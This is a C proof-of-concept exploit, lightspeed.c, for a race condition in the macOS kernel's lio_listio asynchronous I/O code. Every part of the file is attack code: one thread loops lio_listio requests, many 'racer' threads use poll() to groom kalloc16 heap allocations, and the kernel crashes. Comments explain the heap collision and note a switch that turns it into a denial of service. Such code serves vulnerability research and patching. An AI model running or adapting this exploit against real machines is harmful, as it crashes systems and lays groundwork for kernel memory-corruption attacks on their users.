└── lightspeed.c


/lightspeed.c:
--------------------------------------------------------------------------------
  1 | #include <stdio.h>
  2 | #include <string.h>
  3 | #include <stdlib.h>
  4 | #include <fcntl.h>
  5 | #include <unistd.h>
  6 | #include <aio.h>
  7 | #include <sys/errno.h>
  8 | #include <pthread.h>
  9 | #include <poll.h>
 10 | 
 11 | /* might have to play with those a bit */
 12 | #if MACOS_BUILD
 13 | #define NB_LIO_LISTIO 1
 14 | #define NB_RACER 5
 15 | #else
 16 | #define NB_LIO_LISTIO 1
 17 | #define NB_RACER 30
 18 | #endif
 19 | 
 20 | #define NENT 1
 21 | 
 22 | void *anakin(void *a)
 23 | {
 24 | 	printf("Now THIS is podracing!\n");
 25 | 
 26 |     uint64_t err;
 27 | 
 28 |     int mode = LIO_NOWAIT;
 29 |     int nent = NENT;
 30 |     char buf[NENT];
 31 |     void *sigp = NULL;
 32 | 
 33 |     struct aiocb** aio_list = NULL;
 34 |     struct aiocb*  aios = NULL;
 35 | 
 36 |     char path[1024] = {0};
 37 | #if MACOS_BUILD
 38 |     snprintf(path, sizeof(path), "/tmp/lightspeed");
 39 | #else
 40 |     snprintf(path, sizeof(path), "%slightspeed", getenv("TMPDIR"));
 41 | #endif
 42 |     
 43 |     int fd = open(path, O_RDWR|O_CREAT, S_IRWXU|S_IRWXG|S_IRWXO);
 44 |     if (fd < 0)
 45 |     {	
 46 |     	perror("open");
 47 |     	goto exit;
 48 |     }
 49 | 
 50 |     /* prepare real aio */    
 51 |     aio_list = malloc(nent * sizeof(*aio_list));
 52 |     if (aio_list == NULL)
 53 |     {
 54 |     	perror("malloc");
 55 |     	goto exit;
 56 |     }
 57 | 
 58 |     aios = malloc(nent * sizeof(*aios));
 59 |     if (aios == NULL)
 60 |     {
 61 |     	perror("malloc");
 62 |         goto exit;
 63 |     }
 64 | 
 65 |     memset(aios, 0, nent * sizeof(*aios));
 66 |     for(uint32_t i = 0; i < nent; i++)
 67 |     {
 68 |         struct aiocb* aio = &aios[i];
 69 | 
 70 |         aio->aio_fildes = fd;
 71 |         aio->aio_offset = 0;
 72 |         aio->aio_buf = &buf[i];
 73 |         aio->aio_nbytes = 1;
 74 |         aio->aio_lio_opcode = LIO_READ; // change that to LIO_NOP for a DoS :D
 75 |         aio->aio_sigevent.sigev_notify = SIGEV_NONE;
 76 | 
 77 |         aio_list[i] = aio;
 78 |     }
 79 | 
 80 |     while(1)
 81 |     {
 82 |         err = lio_listio(mode, aio_list, nent, sigp);
 83 | 
 84 |         for(uint32_t i = 0; i < nent; i++)
 85 |         {
 86 |             /* check the return err of the aio to fully consume it */
 87 |             while(aio_error(aio_list[i]) == EINPROGRESS) {
 88 |             	usleep(100);
 89 |             }
 90 |             err = aio_return(aio_list[i]);
 91 |         }
 92 |     }
 93 | 
 94 | exit:
 95 |     if(fd >= 0)
 96 |         close(fd);
 97 | 
 98 |     if(aio_list != NULL)
 99 |         free(aio_list);
100 | 
101 |     if(aios != NULL)
102 |         free(aios);
103 | 
104 |     return NULL;
105 | }
106 | 
107 | void *sebulba()
108 | {
109 | 	printf("You're Bantha poodoo!\n");
110 | 	while(1)
111 | 	{
112 | 		/* not mandatory but used to make the race more likely */
113 | 		/* this poll() will force a kalloc16 of a struct poll_continue_args */
114 | 		/* with its second dword as 0 (to collide with lio_context->io_issued == 0) */
115 | 		/* this technique is quite slow (1ms waiting time) and better ways to do so exists */
116 | 	    int n = poll(NULL, 0, 1);
117 | 	    if(n != 0)
118 | 	    {
119 | 	    	/* when the race plays perfectly we might detect it before the crash */
120 | 	    	/* most of the time though, we will just panic without going here */
121 | 	        printf("poll: %x - kernel crash incomming!\n",n);
122 | 	    }
123 | 	}
124 | 
125 | 	return 0;
126 | }
127 | 
128 | void crash_kernel()
129 | {
130 |     pthread_t *lio_listio_threads = malloc(NB_LIO_LISTIO * sizeof(*lio_listio_threads));
131 |     if (lio_listio_threads == NULL)
132 |     {
133 |     	perror("malloc");
134 |     	goto exit;
135 |     }
136 | 
137 |     pthread_t *racers_threads = malloc(NB_RACER  * sizeof(*racers_threads));
138 |     if (racers_threads == NULL)
139 |     {
140 |     	perror("malloc");
141 |     	goto exit;
142 |     }
143 | 
144 |     memset(racers_threads, 0, NB_RACER * sizeof(*racers_threads));
145 |     memset(lio_listio_threads, 0, NB_LIO_LISTIO * sizeof(*lio_listio_threads));
146 | 
147 |     for(uint32_t i = 0; i < NB_RACER; i++)
148 |     {
149 |         pthread_create(&racers_threads[i], NULL, sebulba, NULL);
150 |     }
151 |     for(uint32_t i = 0; i < NB_LIO_LISTIO; i++)
152 |     {   
153 |         pthread_create(&lio_listio_threads[i], NULL, anakin, NULL);
154 |     }
155 | 
156 |     for(uint32_t i = 0; i < NB_RACER; i++)
157 |     {
158 |         pthread_join(racers_threads[i], NULL);
159 |     }
160 |     for(uint32_t i = 0; i < NB_LIO_LISTIO; i++)
161 |     {
162 |         pthread_join(lio_listio_threads[i], NULL);
163 |     }
164 | 
165 | exit:
166 |     return;
167 | }
168 | 
169 | #if MACOS_BUILD
170 | int main(int argc, char* argv[])
171 | {
172 |     crash_kernel();
173 | 
174 |     return 0;
175 | }
176 | #endif
177 | 


--------------------------------------------------------------------------------